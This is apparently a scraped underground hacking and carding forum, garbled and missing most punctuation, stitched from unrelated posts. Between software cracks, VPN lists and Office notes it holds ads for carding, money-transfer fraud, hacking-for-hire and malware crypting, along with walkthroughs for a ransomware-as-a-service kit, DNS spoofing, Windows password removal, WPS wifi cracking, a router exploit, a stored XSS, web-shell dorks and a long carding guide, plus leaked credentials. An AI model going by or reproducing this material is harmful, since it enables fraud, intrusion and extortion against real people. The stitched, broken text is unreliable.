org wiki downloads url open truecrypt and create encrypted container around size mount the container and startup virtual box create new but when you get the hard drive disk creation virtual box click the folder and change the store location the truecrypt container then proceed with installing the choice. 
you now have full disk encrypted drive with encrypted container with different key the full disk with inside which you can snapshot revert back that all have for now will add onto this but have get some sleep will die hope you like the tutorial and has helped someone there more come this tutorial. 
update securing firefox and optimizing. 
type the following into the url bar code about config check here see the before and after results hidden content you must reply see links search for the following network. 
first run false browser. 
disk cache ssl false browser. 
keep alive true network. 
timeout and that all can remember for now off the top head hidden content you must reply see links credits dynamic. 
completely free alternative acunetix vega free and open source scanner and testing platform test the security web applications. 
vega can help you find and validate sql injection cross site scripting xss inadvertently disclosed sensitive information and other. 
written java gui based and runs linux and windows. 
download link hidden content you must reply see links. 
foksi wrote sql injection master course complete guide sql injection which you will design your own lab and learn attack. 
pentesting hacking sqli homepage sql injection one oldest and powerful threat web application yet there great explanation solve the problem and hands guide master sql injection. 
this course you will learn design your own challenges along with the guidance hack into those custom created sites for pentesting purposes. 
you are pentester hacker developer information security enthusiastic you will love this course for sure theories just practical videos learn. 
jump into the course get more. 
vskimmer builder panel download. 
hoping this works thanks. 
thank you much for the share mate. 
thanks for this post wil try out. 
thank you very much for the program. 
pretty sure fake but want see. 
very nice voila beautiful lollolol. 
account has been suspended. 
you feel this has been error please see our term. 
hello jhony rumz form russia doing carding and hacking business for more then years. 
any country you need. 
have worked for many people around the world believe unity. 
trust and honesty needed all field money making contact information below email upupnow gmail. 
com icq hang out upupnow western union transfer transfer asia canada france germany italy nigeria. 
any country info needed for transfers full name city country zip code valid email for sending you mtcn info etc western union rates western union for bitcoin perfect money western union for bitcoin perfect money western union for bitcoin perfect money western union for bitcoin perfect money mtcn will ready for pick maximum minus after payment. 
please dont ask for any free test transfer info needed for bank transfers bank name bank address zip code account holder account number account type routing number bank transfer will take maximum hours show money your bank account. 
price list for bank transfer transfer transfer transfer transfer transfer please dont ask about transfer with small amount. 
you want let start with the minimum rate transfer usa asia and very easy cash out african with mtcn sender's details you can pickup any western union office hours contact information below email upupnow gmail. 
com icq hang out upupnow contact for serious business. 
this really private method with own code gone into this. 
sorry cannot post here. 
intrested contact xmpp otr cylarwarbot creep. 
what this attack does walk into pub bar anywhere there alot people. 
start calling anynumber from everybodys phone. 
send message any number steal texts pictures videos voicenotes. 
real sms bomb numbers. 
disable phones and completely destroy them. 
updates coming more speed. 
more exploits more power. 
things needed any rooted device with arm disc linux. 
signal signal antenna not needed but only you wish distance. 
vps ftp server setup connection your somewhere and start sending data back home log all. 
the script took while make had purchase multiple mobile phones for testing. 
developed well over zero day exploits for this tool. 
and will only going good people catch drift. 
microsoft office professional plus april iso microsoft office well demonstrates how today has changed the approach create documents and work with them. 
many are beginning work the same computer continues the other demonstrated the third simultaneously managing make minor changes for laptop tablet smartphone. 
therefore office tried make conceptually different. 
almost all the key elements have been developed from scratch and applications oriented single style work regardless the hardware platform. 
they are designed provide the usual functional any device automatically adjusting its interface the parameters the current screen and the available system resources. 
what new already available onenote and window math input control now available word excel and powerpoint. 
you can write math equations with digital pen pointing device even your finger and have the ink converted typed format. 
this feature simplifies resolving conflicts when coauthoring. 
you can choose between two versions the conflicting slides your changes others changes instead sifting through the individual conflicts. 
this feature increases the number default shape styles introducing new preset styles word excel and powerpoint. 
improved the timeline view microsoft project you can now have multiple timeline bars single view and you can set the date range for timeline bars they can just represent specific phase your project. 
try this out click the timeline and then the format tab. 
note the new date rage and insert timeline bar commands. 
visio diagramming can intimidating for someone who new visio and not used the rich set tools offered. 
the getting started experience now makes the visio canvas more inviting providing select set pre crafted starter diagrams which will help the users some the very core scenarios for that template. 
addition there are some tips provided with the diagram which help the users editing and completing their diagram creation experience. 
using visio easier than ever. 
the preview has higher dpi support for and that your office documents look great larger screens. 
more waiting while large charts and smartart diagrams load the text will appear right away allowing you dive right and start editing. 
placeholder for the chart smartart will displayed until the object fully renders but you can still interact with the document. 
changed the default office theme align with the visuals our modern apps. 
the default theme now colorful previously the default theme was white. 
you can always change your theme going file account office theme. 
now with automatic image rotation once you insert image into the apps automatically rotates the picture match the camera orientation. 
you can manually rotate the image any position after insertion. 
note that this only affects newly inserted images and does not apply pictures existing documents. 
the building plan and electrical stencils have been refreshed with new shapes you have more variety choose from. 
open excel workbook within sharepoint quickly read only mode quickly get what matters most. 
this new theme designed provide users with visual impairments who find overly bright displays unusable office with more visually subtle background work with the apps. 
dark theme also includes improvements word navigation pane better readability fixed white flashes and several outlook readability fixes white text light background dark text dark background disabled text being unreadable. 
the contextual ribbon tab text hover states and task pane controls have also been improved. 
new chart types quick data linking visio and many more how install download bit iso per your system run setup. 
exe click install office button wait till installs open any office product. 
word wait till some popup windows appear cancel popup sign and activate close office and visit crack page given below follow steps given that page that all hidden content you must reply see links hidden content you must reply see links. 
hidden content you must reply see linkshidden content you must reply see links note always perform virus scan and download your own risk hidden content you must reply see links ejlidibi xepnt hodbfygjeqaqmg. 
ransomware threat the rise but the bad news that ransomware campaigns are easier run and now ransomware kit being offered hackers for free for anyone download and distribute the threat. 
ransomware type computer virus that infects target computer encrypts their sensitive documents and files and locks the out until the victim pays ransom amount most often bitcoins. 
sometimes even the best security experts aren't able unlock them and end paying off ransom crooks order get their important files back. 
tox free ransomware kit now spread this creepy threat more easily even non tech user one dark web hacker has released ransomware service kit dubbed tox for anyone download and set their own ransomware for free. 
yes believe not but tox completely free use. 
the developers the online software make money taking cut any successful ransomware campaigns its users run. 
tox which runs tor requires not much technical skills use and designed such way that almost anyone can easily deploy ransomware three simple steps according security researchers mcafee who discovered the kit. 
how setup your custom ransomware takes only few seconds create and set your custom ransomware. 
just create account the tox website without the need provide your email address any other identifying information. 
once user register with the site follow these three simple steps creating your own malware type desired ransom amount you want ask victims for. 
provide additional note the cause presumably the message that will alert victims that they are being held hostage piece malware. 
finally you are prompted fill out captcha and click create. 
this process creates executable about that disguised. 
scr file mcafee hidden content you must reply see links. 
then the tox users distribute and install they see fit. 
the tox site runs the tor network will track the installs and profit. 
withdraw funds you need only supply receiving bitcoin address. 
your ransomware now ready infect people your custom ransomware designed work windows systems now ready and available download and spread. 
once downloaded you can target people sending your virus email attachments just like the style traditional phishing emails. 
once victim accidentally opens the offending. 
scr file provided email the payload will encrypt all the data their system and only decrypts bitcoin payment made. 
hidden content you must reply see links target pays the ransom amount the bitcoin then transferred the user's tox account from where tox takes percent cut and the rest can withdrawn the user. 
ransomware growing threat the evolution cyber criminals techniques and many victims including local police departments pay ransom crooks attempt get their important and personal files back. 
how protect yourself from ransomware threat last week introduced you hidden content you must reply see links that could help you deal with different variants ransomware malware and unlock encrypted files without paying off single penny the cyber crooks. 
however there are some necessary steps that should taken protect yourself from ransomware attacks. 
remember always keep regular backups your important data. 
make sure that you run active anti virus security suite tools your machine. 
not open any email attachments from unknown sources. 
finally browse the internet safely. 
keep yourself safe also have excellent article hidden content you must reply see links. 
nice post regards the vyctim. 
nice also gud buddy. 
would love have cheat sheet. 
sounds like good upload thanks pal thunbs. 
nice poost gud work. 
for the thread will learn from thanks. 
really leaked just fake. 
working not lettme check. 
this simple guide read somebody else facebook messages without any effort cheers mike tired replying people. 
atm escrow service handled only administrators forum. 
escrow procedure mutual agreement vendor and buyer presented. 
escrow fees are paid non refundable both parties. 
funds services are lodged escrow funds services are transferred accordingly parties confirms receipt deal closes. 
escrow rules the minimum amount usd. 
only btc wmz any irreversible currency escrows. 
which means risk charge backs for the buyer seller well. 
escrow fees are flat transaction fees. 
free for vip members the deal fails the entire amount gets refunded back the buyer. 
requesting escrow simply create thread this section stating what you buying price and from whom. 
icecream screen recorder pro. 
patch ddl icecream screen recorder flexible and useful application that can help you quickly record certain area your screen capture snapshot anytime you need. 
features area selection select the area your screen that you like take screenshot make video single click. 
drawing panel draw outline and add arrows text your screenshot video while capturing. 
project history fast access all captured videos and screenshots. 
audio settings change the volume your microphone and system sounds. 
clipboard save screenshots the clipboard and share them via skype mail instantly. 
settings hide cursor desktop icons and disable screensaver necessary. 
screenshot url send screenshots icecream apps server single click get short url and share with anyone. 
server language eng rus medicine patch please read first then proceed download free file hosting sites are allways supported strongly recomended use blocker like adblock plus adguard ublock ublock origin admuncher extentions your browser for get rid annoying ads popups stop browser redirection your privacy will protected also. 
adblock plus adguard ublock ublock origin admuncher are essential antivirus. 
please see how download section which given bellow post. 
download icecream screen recorder pro. 
patch ddl hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links see how download how download from dailyuploads how download from userscloud you might see page direction time pop. 
just close redirected page instantly then click above button again get your download link this happening recently from dec how download from filescdn you might see page direction time pop. 
just close redirected page instantly then click above button spent lot hours test and upload you like post dont away after download seriously hit that button that's motivating factor note always perform virus scan and download your own risk hidden content you must reply see links ejlidibi xepnt hodbfygjeqaqmg. 
advanced dns hijacking its not made. 
even pwned pakisani's google ebay and many sites. 
advanced dns hijacking guide still hayattayiz and are still going. 
gaza our greetings eboz hotmail. 
com the dns hijacking presentation hello people hacking dns address spoofing you may wondering what. 
dns hacking hacking phishing not the normal way like any erect. 
this method based the dns protocol security. 
more brutal the dns hacking parody very effective very strong because there generation even dns escapes rampage winnt. 
the dns protocol mechanism description the first step you need know how works for dns. 
will outline only this protocol one the most important facts. 
this will follow request for dns packet path from the client sends request bla. 
resolve the name bla. 
let's take look the following image. 
com format addr addr port port. 
here the source port when you see our name resolution request port for dns. 
note always the dns port now dns. 
com took the resolution request dns. 
com let's see you will have resolve the name. 
dns hidden content you must reply see links. 
com asks for the root name server for the address who. 
net hidden content you must reply see links and does not exist and sends demand for. 
com domain has the name server authority. 
note you can ask for this request its cache because internic. 
here you can see the. 
net answered the dns domain name this authority over bibi. 
com hidden content you must reply see links and will ask for the address the. 
com but this one does not have forward dns requests and heike. 
com has the authority heike. 
com which address field has the right know ask what the machine we'll call. 
com hidden content you must reply see links after. 
and now can least have our answer. 
have the answer please let our customer bla. 
com hidden content you must reply see links knows the computer. 
now want imagine machine name for most his way continue will little different must converted because example will addr. 
watch out this method only for resolution request reverse dns hidden content you must reply see links. 
let's look the most practical when the between after understandable translation. 
arpa the dns format. 
will send you name server. 
net has the authority. 
now will ask you the same question. 
fact the name almost the same that was used for the mechanism the resolution. 
hope you figured out how dns works communications. 
now let's study the dns messages format. 
the dns packet dns message format here identity the famous flag questions numbers the answer the numbers authorization number the number additional questions answer matter the pages etc. 
the structure dns packets. 
name identify each since the exchanges between allows dns package servers port port and the more can have more than one request time the identity the only way get know the different dns requests. 
well talk you later about. 
flags the flags field divided into several sections bit bit always opcode zero rcode bit bit bit bit this package question that comes from the otherwise have answer. 
opcode normal request for reserve value from and for status request not need know all these modes. 
equal says that the name server authoritative answer. 
matter the this flag set for example means recursion bla. 
com resolve the name when the flag. 
com this tells the dns accept the request. 
set which means that the existing this recursion. 
this bit set the name server response supports iteration. 
here are three zero zero. 
rcode this includes error messages returned for dns requests error name error means the following flags matter for. 
dns question here's dns question format follows question name question type query type the nature the problem. 
example hidden content you must reply see links has the same thing address. 
arpa arpa will note have compression format but will not use. 
question type most the time values that you will use here are note there are more than types different values and i'm sick writing the value name address name resolution ptr pointer the name analysis query type according the type the values the same true not know but not able target the dns protocol from this you need look the rfc and from the goal here put into practice global dns reply have format that call our answers the. 
but don't mind here reply the form domain name type class ttl time live source data length source data domain name name the domain the following source reports domain name for this section are stored the same way question hidden content you must reply see links resolution request the flag will the domain name contains type type the question section query type more the same flag package. 
class class flag equal for internet data. 
live time this flag tells the life time the information into seconds name the server cache. 
the length the source data the length the source data from the source data length for example the source the data the data length bytes. 
source data here for example put the least our case will present small example that describes better here's what. 
com hidden content you must reply see links address. 
com hidden content you must reply see links phear heike opcode questions numbers htons answer numbers the number authorized the number additional the question part question name question type htons query type htons here the question. 
now i'm looking the most. 
com and let the answer. 
com opcode questions numbers htons number answers htons the number authorized the number additional question name question type htons query type htons domain name type htons class htons time live source data length htons source data inet addr. 
yah all this for now here's analysis the answer answer this because has the authority because their domain name server because the replica available good hope you will need the following for reasons not understood events. 
the dns hacking parody what dns hacking phishing now clearly the time has come explain. 
recognize the dns daemon explained earlier the only way different questions answers the package the flag. 
look this example hidden content you must reply see links. 
com you just have give the wrong answer the between parody and. 
com for information before. 
com hidden content you must reply see links. 
com you're lan but practice you have guess good the name server can listen answer before this identity and this easy local area network you want this you not have lot options remote only there are four basic methods. 
the identity flag all possible values the random test. 
you must answer this example. 
this method now obsolete i'd want know. 
any other suitable condition his prediction. 
increase the chances some dns requests falls upon good. 
prevent paint the dns. 
the name server crash and does not show the following error oct adm named free active set abort this time the order the named daemon. 
are discovered using the vulnerability bind sni secure estimate will discuss this bit with networks inc. 
windows venlik have not tested windows severe vulnerability found winnt windows lets you imagine little friend. 
because windows live default extremely easy guess the second question question the same time. 
venlik uymasini vulnerability bind sni discovered the previously mentioned. 
fact only one dns dns easily predictable you have sniff order what you want. 
dns was originally random use increase but only used the next questions. 
easy exploit this vulnerability. 
comes from random dns messages easily. 
can sniff for this example. 
com solve the random. 
com will random seek solve. 
now you know what's the message from. 
com you have use the customerid field. 
then the resolve request. 
com you hidden content you must reply see links. 
paint the name the server with. 
com already exists and then this one. 
com now know and they are just predictable dns ids. 
com torrent with fake answers with admsnoofid. 
without stem there another way exploit this vulnerability any dns the mechanism very simple. 
here description send resolution request. 
there nothing new here but the interesting part starts here. 
from that point fake. 
com start flooding with answers. 
have for that time found the correct otherwise have repeat this attack until the find his identity. 
little long but works. 
and nothing forbides with your friends how does this admnog. 
need paypal cashout make hundreds day have you got paypal account you could making hundreds day like requirements aged paypal account. 
can receive goods and services payments. 
you are ebay seller you're guy you will make thousands contact icq email nico. 
when say ransomware the first nasty piece malware strikes the mind cryptolocker. 
nasty strain ransomware malware that threatened most the people around the world effectively destroying important files the victims forever. 
cryptolocker devastating threat cryptolocker simple rather devastating piece ransomware that encrypts the files victim computer and issues ultimatum pay lose your data. 
cryptolocker particularly designed extort money from computer users holding computer files hostage until the computer user pays ransom fee get them back. 
cryptolocker hijacker sniffs out your personal files and wraps them with strong aes bit encryption before demands money. 
how decrypt cryptolocker free tool released thanks security experts who created online service where victims whose systems have been encrypted the cryptolocker ransomware can get the decryption keys for free. 
this online portal has been created the security researchers from security software and services firms fireeye and fox. 
the researchers created the portal after they used copy cryptolocker's database victims that was obtained during the recent takedown the gameover zeus botnet which was used distribute the ransomware. 
this time basically got lucky said michael sandee principal analyst fox one the security firms which helped uncover the cybercrime group behind cryptolocker. 
the infrastructure cryptolocker and other malware was taken down june under campaign known operation tovar but there are still many cases where this nasty strain ransomware infecting users according fireeye. 
after the success operation tovar there were few resources available help decrypt files that were still encrypted with the attacker private key fireeye explains blog post. 
cryptolocker demands but online decryption tool free where cryptolocker ransomware forced its victim pay upto bitcoins within hours for the private keys necessary unlock personal files the other hand the security firms are providing the private decryption keys for free via the just launched decrypt cryptolocker website. 
according fbi estimates from june more than people fell victim cryptolocker between september and may. 
percent victims paid free their files which indicates the malware earned its makers around million before the criminal network was smashed authorities and security researchers may. 
how decrypt files infected cryptolocker you only need master decryption key order decrypt the locked files. 
com upload email address and one the encrypted files one that should have sensitive information. 
the online tool will scan the file figure out the encryption specifics and then send you recovery program and master decryption key via email. 
you can take that key and the free decryptolocker. 
exe command line tool and decrypt your files. 
fireeye warns that some data might not recoverable particularly you've been infected cryptolocker variant rather than cryptolocker itself. 
you need keep this mind that there are many cryptolocker variants with the names like prisonlocker cryptodefense torlocker and cryptorbit the tool may not work against them. 
friends table width free vps code added redeem fast register this site hidden content you must reply see this content code given below. 
'billing' and input your info. 
just add sme info there payment option not necessary. 
scroll below and enter the promo code ssd for credit. 
create new droplet vps server with your free cash you can create two droplets one. 
they have pretty good configurations especially since you got them for free. 
you can use these cloud servers mine cryptocurrency for running hitleap jingling its free vps enjoy atleast redeem the promo code. 
note all jobs range from hrs hrs max client satisfaction moore's priority you get your money's worth you refer client result the previous job done for you you will stand chance getting any job your choice hacked for you free charge. 
poor protection download here hide reply attach attach hide reply. 
kernelcop wrote that's webxp cam that's not scada it's node device connected via pci controller router your case intelligent one like those cisco installed ones. 
what show you here real scada yes but. 
bro scada one type industrial controller system also called process control. 
can control industrial work and watch using scada. 
aye sweet leak bruv. 
yesterday bsalka wrote php skrip bekerja gratis untuk memeriksa email valid dan registred dengan paypal. 
thanks will try this. 
hope this works all friends are for surprise. 
guys here another tutorial thought about writing ever had computer and you forgot the password possibly lost all your data well this how you change all windows passwords with few simple commands what you need. 
live with linux either one works plug load linux download get ubuntu type code apt get install synaptic open synaptic search for chntpw either mark for install mark for reinstall right click click propriters installed files and you should see where installed for example mine located here code pentest passwords chntpw code execute the following commands code fdiks find out the location your windows partitioned mount dev sda mnt mine called sda mount sda folder mnt mnt windows system config chntpw sam for interactive mode chntpw administrator sam edit administrator account instead going through interactive mode you will now given the option blank out the password pressing well several other ways change the user such upgrading their account administrator. 
press exit the edit user screen and then press exit chntpw and you will prompted save any changes. 
sure save the hive file once your out type code unmount sda restart windows type your new password you made blank chntpw should straight the desktop and that how you edit any type windows passwords enjoy shout. 
pratham wrote yeah nice. 
want patch edit plus try this patch and say. 
method use enclosing the cracked exe and password protected for internet security use the password open. 
password phoenix copy paste and replace the original exe with the cracked one. 
register with the name and serial you want register. 
hope works for you. 
don't know this really works not but see this can help you out hidden content you must reply see links. 
dagmaharp wrote just needing the link. 
why necessary post get links and the only one wanting these links same here bro. 
its realy annoying and leads absolute meaningless posts and replies. 
anonymous surfing vpn and proxy tools there are many options when comes being anonymous online. 
here are just few hola vpn hola peer peer vpn network that provides everyone the planet with freedom access all the web works through the community its users hola users help you access the web. 
free for non commercial use. 
you can download from here jondo jondo open source and free charge program for windows linux and macos. 
hides the user's adress behind anonymous address. 
contrast other anonymizers vpns anonymous proxy servers the user's anonymity stays protected even against the providers operators the anonymous address. 
changer and anonymization program that you can use for anonymous surfing the internet with high security anonymous proxy servers. 
free for notmal use with limited restrictions. 
you can download from here tor tor very useful for online anonymity its protect your privacy defend against form network traffic analysis. 
traffic analysis can used infer who talking whom over public network. 
knowing the source and destination your internet traffic allows others track your behavior and interests. 
tor network virtual tunnels that allows people and groups improve their privacy and security the internet. 
also enables software developers create new communication tools with built privacy features. 
download from here tortilla open source tool that allows users securely anonymously and transparently route all tcp and dns traffic through tor regardless the client software and without relying vpns additional hardware virtual machines. 
you can download from here proxpn proxpn's vpn software lets you surf the web the way was intended anonymously and without logging and tracking your activity. 
it's global vpn virtual private network that creates secure encrypted tunnel through which all your online data passes back and forth. 
any application that requires internet connection works with proxpn including your web browser email client and instant messaging program keeping everything you online hidden from prying eyes while masking your physical location and giving you unfettered access any website web service matter where you happen live travel. 
download here ultra vpn ultravpn simple user interface connect disconnect their vpn servers. 
use ultravpn you need right click traybar icon the bottom right your screen that looks like computer with red screen. 
after right clicking choose connect. 
can used any individual who simply wants protect his privacy either lan public hotspot. 
download the software client here and create free account here hope this helps some you guys. 
did just thank you will. 
sorry the file you requested not available. 
can you upload again tnx. 
free one openly shared may get ban sooner hidden content you must reply see links hustlinu boogeyman bubba emnkate mattybecker buayeah citiworld milesmore msebart braves misterj lightning drzippy austin samella bellaella summit summit wingnut acoma davidolaussen stusselig mouthbreather happy diabolik smacksie kryohum xdf jstolich horny weinkeller balkon takazume purple drzippy austin jmarti summit summit toddstein ossobucco mattybecker buayeah citiworld milesmore msebart braves misterj lightning samella bellaella kryohum xdf porsche jstolich horny weinkeller balkon takazume purple drzippy austin jmarti summit summit lutzern ludmi hustlinu boogeyman bubba emnkate msebart braves drzippy austin wingnut acoma karellan danger buck duchess mbecker maggie prickie moraus diabolik smacksie kryohum xdf porsche jstolich horny weinkeller balkon wingnut acoma drzippy austin karellan danger buck duchess mbecker maggie davidolaussen stusselig hustlinu boogeyman msebart braves takazume purple drzippy austin jmarti summit summit lutzern ludmi milferna horn prickie moraus kryohum xdf porsche jstolich horny weinkeller balkon wingnut acoma drzippy austin karellan danger buck duchess mbecker maggie hooterd avg avg paulell trippel kryohum xdf porsche drzippy austin karellan danger weinkeller balkon liverpool golfer golfer gdansk zba rex manutd csspersonal cypher qudpas mouthbreather happy dlobrownboy forget spike spike paulell trippel jstolich horny wingnut acoma buck duchess mbecker maggie hooterd avg avg paulell trippel kryohum xdf porsche jstolich horny wingnut acoma drzippy austin karellan danger buck duchess mbecker maggie hooterd avg avg kryohum xdf porsche drzippy austin karellan danger weinkeller balkon liverpool golfer golfer gdansk zba rex manutd gdansk zba. 
yeah thank really apreciate. 
exploit title wireless lite adsl modem router model multi exploit author pratham wireless lite adsl modem router model multiexploit modem pic change login password. 
cgi syspassword new password upload config. 
lets see what have. 
codefire wrote cheatsheets penetration testing security cheatsheets that have collated over the years. 
com jshaw cheatsheets thanks. 
nightmare wrote also want learn cpanel cracking. 
pratham bro please upload tutorials soon. 
thnx thnx thnx okay. 
want only trusted members and members who really want learn. 
i'll post forum soon possible. 
click search home show off all forums community upgrade vip account search search forum help help documents money make money more more links offensive community xvyctim offensive community cracking zone cracking tutorials informations facebook hacking announcements pretty cool huh share pages next new reply thread rating thread modes facebook hacking jaf danial offline junior member posts threads joined apr reputation money donate newbie hacking. 
can posible internet offline junior member posts threads joined jun reputation money donate hidden content you must reply see links greybat offline junior member posts threads joined may reputation location maharashtra country india money. 
neobond offline junior member posts threads joined jun reputation location india country india money. 
donate thanks for the info was looking about this for long. 
creed offline junior member posts threads joined jun reputation location country pakistan money. 
donate wink internet wrote url skdkspkc offline junior member posts threads joined jul reputation location texas country united states money. 
donate was wondering the same exact thing. 
kamalakannan offline junior member posts threads joined jul reputation location tamil nadu country india money. 
donate thank for information blues offline junior member posts threads joined jun reputation location java country indonesia money. 
donate thanks for sharing want see works arhacker offline banned skype posts threads joined jan money. 
donate rainbow notbad troll yay kamalakannan offline junior member posts threads joined jul reputation location tamil nadu country india money. 
donate thanks for valuable info. 
enter keywords search thread pages next new reply quick reply message type your reply this message here. 
click search home show off all forums community upgrade vip account search search forum help help documents money make money more more links offensive community xvyctim offensive community hacks exploits and various discussions proxies and socks again super proxies new fresh announcements our forum merge with indianhacker. 
net login with old details share new reply thread rating thread modes again super proxies new fresh montana offline junior member posts threads joined aug reputation money donate this post was last modified codefire. 
will grateful for your help xvyctim online the vyctim posts threads joined jan reputation location warning level money. 
less than minute ago close search. 
color color want hack only one site see another card table. 
will pay you request you want. 
you can give trial maybe minute minute better. 
contact asap via email klimenhautten gmail. 
codefire wrote how crack wifi password android crack wifi password android android most popular for any users. 
here presenting easy method which you can crack wps available wifi password easily without any commands. 
most wps available wifi are vulnable some them are not. 
you can try this method may work for you not depend your luck vulnability wifi. 
here will show you app names which can crack wifi passwords from rooted android device. 
cracking wifi password from android phone now everyone dream. 
back again with working method for crack wps available witi nearby your areas. 
and enjoy free high speed internet. 
requirements for crack wifi password android rooted android mobile nearby wifi with wps abailable features this wifi cracker apk cracking any wep wpa and wpa wifi wps available faster method took only seconds much more. 
steps for crack wifi password android how crack wifi password mobile first download wifi cracker app name after download open app give root permissions click grant after that click refresh icon from top right will show you list all available wifi available your area wifi has wps available vulnable then will cracked click wifi name click try connect then will take seconds maximum boom will show you wifi password now wifi has wps available and vulnable wifi not vulnable then will give you error you got this error then your bad luck. 
lordraztg wrote nice share thanks welcome. 
that great thank you. 
cool lets try this. 
anyone here have sms bomber with them kindly send thank you. 
cyberseason wrote are using mitm and sniffing method will work only the victim your network yeah dude only works lan. 
wrote yea you heard correct its leaked not believe take look the link enjoy mike. 
thx bro want learn hmm. 
let see whats the leaks. 
nice share dear bro. 
thanks try this software. 
nice post for newbie. 
wow i'll try now. 
thanks for the spammer. 
now days most the linux kernel server show this error when you try symlink the server. 
most the server which shows forbidden has cant read named. 
config error when you try symlink using scripts like symlink madspot security team shell what ever script used for automated symlink. 
let try this working. 
steps for crack wifi password android how crack wifi password mobile first download wifi cracker app name after that click refresh icon from top right will show you list all available wifi available your area wifi has wps available vulnable then will cracked click wifi name click try connect img then will take seconds maximum img boom will show you wifi password now wifi has wps available and vulnable url img wifi not vulnable then will give you error you got this error then your bad luck img. 
thx will have look. 
nice big mailist needes but anyways. 
very very nice exploit bro rofl. 
more grease your elbow. 
com premium account user bobjoe pass bobjoe tested working. 
enter into web server and browse server files upload files directly using this simple dork. 
filetype php haxplorer server files browser ppy. 
most the schools colleges offices block the sites like facebook com youtube com etc their servers ecoz they doesnt want the students employess their time. 
but its time unblock those sites and have acess all the blocked sites. 
method using web based proxies google and search for free web proxies and you will get list free web based proxies. 
com proxy open any those sites and enter the site url you want visit and just hit open. 
method using google itself proxy open translate. 
enter any blocked website link you want access. 
choose any language other than english the from and choose english box. 
thats you are now using google itself proxy. 
method open blocked sites using port proxies open mozilla firefox. 
com proxy list choose any port proxy address having good connection time and speed. 
note down the proxy and port. 
now mozilla firefox tools options advanced netowrk settings connection click manual proxy configuration. 
enter the address and the port. 
select the option use this proxy server for all protocols. 
open blocked sites for free have happy surf ing. 
find out your husband cheating. 
private investigator can find out fast because they have gps tracking devices track your husbands location. 
they can get phone records such deleted text messages. 
they can monitor their computer usage. 
the use hidden audio and video devices. 
they can send female decoys test their intentions. 
private investigator will get the truth quick. 
for confidential consultation email gmail. 
com hack into any school database and change university grades matter how secured hack into credit bureau database and increase your credit score hack any email social network and know your partner cheating you hack into your partner's phone pics text message and listen calls know cheating hack into any bank website hack into any company website hack into any government agency website hack into security agency website and erase criminal records hack into craigslist and remove flagging hack into any database system hack paypal account hack word press blogs server crashed hack untraceable internet protocol etc have you your child been bullied online before and want get back the person can help you trace the actual location the person and whatever you request the persons computer anyone blackmailing you online and you want get into their computer and destroy data and evidences against you email gmail. 
asdfgh zsxdcfvbgnh sxdcfvbgn sdcfvbn xcvbn. 
thnks for helping pepole buddy. 
thank you for the share. 
exploit title vbshout vbulletin stored xss vulnerability google dork intext vbshout date. 
exploit author izy vendor homepage. 
tested linux windows stage usercp custom commands direct link. 
php profile action customcommands stage add malicious hash tag. 
cookie this was written for educational purpose only. 
author will not responsible for any damage caused user assumes all responsibility. 
intended for authorized web application pentesting only. 
awesome good work thank you. 
may thats work bro nice posting. 
codefire wrote indent sqli binger works with bing and automatically finds sqli vuln sites same server. 
here demo how works. 
you can also use google dork just click bing and change google. 
see the demo click download link click virus scan link click indent. 
just found these another site. 
dont have virustotal dont know its working not. 
link hidden content you must reply see links. 
this will definitely very useful for. 
thanks for posting this. 
always wondered how now shall find out. 
thanks codefire love homo. 
hidden content you must reply see links user masterbla pass masterbla. 
tnx for shering bro. 
php user masterbla pass masterbla. 
been looking for darkcomet tutorial for while now thanks. 
color its like crypto mining and very old. 
anyway tryed few months ago and works. 
also make payouts but without refering any people unless you have highend grafikcard you will not earn much money color. 
hope this works lol. 
are offering crypting services. 
features very strong persistence registry file injection persistences. 
delay execution hide file icon changer anti's anti anti sandboxie anti wireshark remove zoneid injection self inject applaunch. 
for native files svchost. 
exe startup custom key custom folder custom location custom filename. 
custom injection string small stub uac bypass fud long fud time weeks its compatible with all rats stealers keyloggers botnets etc. 
prices crypt you are buying crypts more you will get crypts for free anytime and future crypting services will cheaper for you payment only bitcoin contact jabber shadow exploit. 
email extractor rat botnet cpanel fud crypting. 
carding carding online instore going through vendors and advice phishing for change billing addresses including drops and what you need know huge guide written carding carding online instore going through vendors and advice phishing for change billing addresses including drops and what you need know huge guide written kay major updates done this carding guide will cover the basics most carding knowledge. 
going into absolutely everything would mean having onto theft and fake ids which can classed different categories their own. 
kay major updates done this carding guide will cover the basics most carding knowledge. 
online carding quick overview what online carding socks and why use them finding cardable site and what cardable means carding non cardable websites with fake scans and other fake documents carding while the job getting cvv cvv through use mobiles skimming whilst the job using carbonless receipts get details pretty outdated method trashing trashing for receipts and credit reports pretty outdated although still works phishing over the phone phishing over the phone for details keylogging for cvv hardware keylogging carding instore what instore carding very brief how it's done how act and present yourself instore carding over the phone carding over the phone irc services provided irc advantages using irc for info disadvantages how find carding channels will not too much into this there are secrets between fellow carders which like people interested enough find out for themselves vendors and how approach them how rip irc every vendor reliable not has ripped some who acted like they knew what they were doing bug bullshit and how rip and gain more phishing for change billing what cob and why it's useful use through phishing pages use through keylogging drops and what you need know about them drops and what you need know about them what carding carding summed quickly the act obtaining someone's credit card information from the cvv cvv cvn and the billing address along with the expiry date and name the person the card belongs along with signature. 
online carding online carding the purchasing goods done over the internet with the cvv. 
now for you bies you're probably wondering what cvv it's simply just the database basic info for the card such the card type. 
mastercard first and last name address and post code phone number the card owner the expiry date and start date it's debit card prepaid the actual number and the cvc card verification code which the digits the back the card. 
this the format you usually get them when you buy off irc nigerian mugu fake street fakeville fake city trh socks and why use them now with any fraud all you have take precautions you don't make easy for anyone catch you your wrong doings. 
usual swear against tor for carding scammin because most nodes are blacklisted websites and because tor cycles through various different proxies and even you configure straight through exit node your choice it's still not worth. 
you can use jap but make sure you're using some constant sock proxies from the same city town area that the card from also wardriving and use vpn don't trust anyone off irc with these you'll have some searching around yourself for highly trusted one and one which won't comply with. 
you can get good socks from anyproxy. 
net people are selling accounts for the site irc all the time that's the best place but even ended losing the account eventually unknowingly was sharing with some nigerian dude who became selfish. 
use socks because they stay constant. 
but don't let that get your guard down you want fresh proxies everytime you card. 
finding cardable site and what cardable means basically cardable site holds these and what you should looking for determine easily cardable website the top one you need look for the site's tos that they send any address and not just the one registered the card although you can easily get around this they don't with cob photoshopped verification will into detail later some social engineering over the phone. 
the next important look for they have visa verification code mastercard secure code most the time you ask your vendor they'll include them your cvv details textfile they have one these you have put and you don't have them then don't waste your time they ship for obvious reasons but you can just stick local websites and order your local drop they leave packages the door when one's around the back safe area know one site the that has all these qualities including this one perfect for carding clothes also you can't forget see what other security checks they need they need call you verify want utility bill passport scan the actual hard find websites online now that have most these qualities therefore have use cobs and photoshop help along the way which what i'll into now. 
